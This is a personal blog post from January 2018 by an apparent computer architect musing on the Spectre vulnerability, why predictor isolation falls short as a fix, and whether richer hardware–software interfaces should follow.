Spectacular

January 16, 2018

Spectre has nerdsniped me, hard. I’ve been walking into lampposts and stuff. The more I think about it, the less I understand it.

The first shocking thing is that, once you read about it, the problem is so easy to see. To summarize: predictor state is untrusted, and mispredicted execution paths can leave traces in the memory system, so malicious code can observe the behavior of “impossible” paths. It’s a fundamental problem in an idea that’s been architectural gospel for decades. It’s one of those obvious-in-retrospect epiphanies that makes me rethink everything.

The second thing is that it’s not just about speculation. We now live in a world with side channels in microarchitectures that leave no real trace in the machine’s architectural state. There is already work on leaks through prefetching, where someone learns about your activity by observing how it affected a reverse-engineered prefetcher. You can imagine similar attacks on TLB state, store buffer coalescing, coherence protocols, or even replacement policies. Suddenly, the SMT side channel doesn’t look so bad.

Sufficient Conditions

But the main thing that mystifies me is how to fix it. What is the weakest possible restriction on speculation that would prevent Spectre? There are the easy, strong conditions:

It suffices for an architecture to do any of these things—or to pretend to do them, by rolling back the microarchitectural state when a misspeculation resolves, for example. These are crude solutions, but maybe this where the Spectre will end. Maybe processor designers will stop speculating through L1 misses, take the performance L, and move on.

But I have a feeling that these restrictions are too strong. There are situations where speculative misses should be safe to service, if the hardware could detect them:

Each of these conditions represents an exception to the no speculative misses rule. Piecemeal exceptions are unsatisfying, though. I’m suspicious that there’s a clean, general rule for deciding which speculative accesses are safe. Even if that sufficient condition is wildly impractical to enforce in hardware, we should nail it down.

An Insufficient Fix

One tempting mitigation is to isolate the predictor state. The proof-of-concept attacks we know about rely on the attacker’s ability to manipulate the predictor into mispredicting in useful ways. Without carefully orchestrated BTB collisions, malicious code would not be able to “mistrain” the predictor to bend it to its will. For example, consider an architecture that flushes the BTB or swaps its state when transitioning between trusted and untrusted code. The untrusted code can execute as many cleverly-crafted branches as it likes, but only trusted-code branches can influence trusted-code predictions.

While predictor isolation makes Spectre attacks more difficult, it cannot prevent them. Even if untrusted branch instructions can’t manipulate the BTB, malicious inputs can still influence the outcomes of branches in trusted code. An attacker can identify input-dependent branches in the kernel or browser that collide in the BTB with a target branch. This way, the attacker can manipulate trusted code into plotting its own demise.

The Bright Side

Spectre may have driven me to distraction, but like many architects, I see an upside too. Perhaps this shock will spur a transition to richer hardware–software interfaces that let programs communicate richer security policies than traditional rings allow.

Perhaps this mess will hasten the end of the von Neumann abstraction. When we tell the Spectre story in five years, we may say that it arose from the widening semantic gap between an ISA paradigm from the 1960s and a high-performance execution engine from the 2010s. Maybe it’s time to expose a more detailed model of how modern processing actually works so software has a chance in hell to audit it for security. Dormant VLIW and EDGE boosters, rejoice.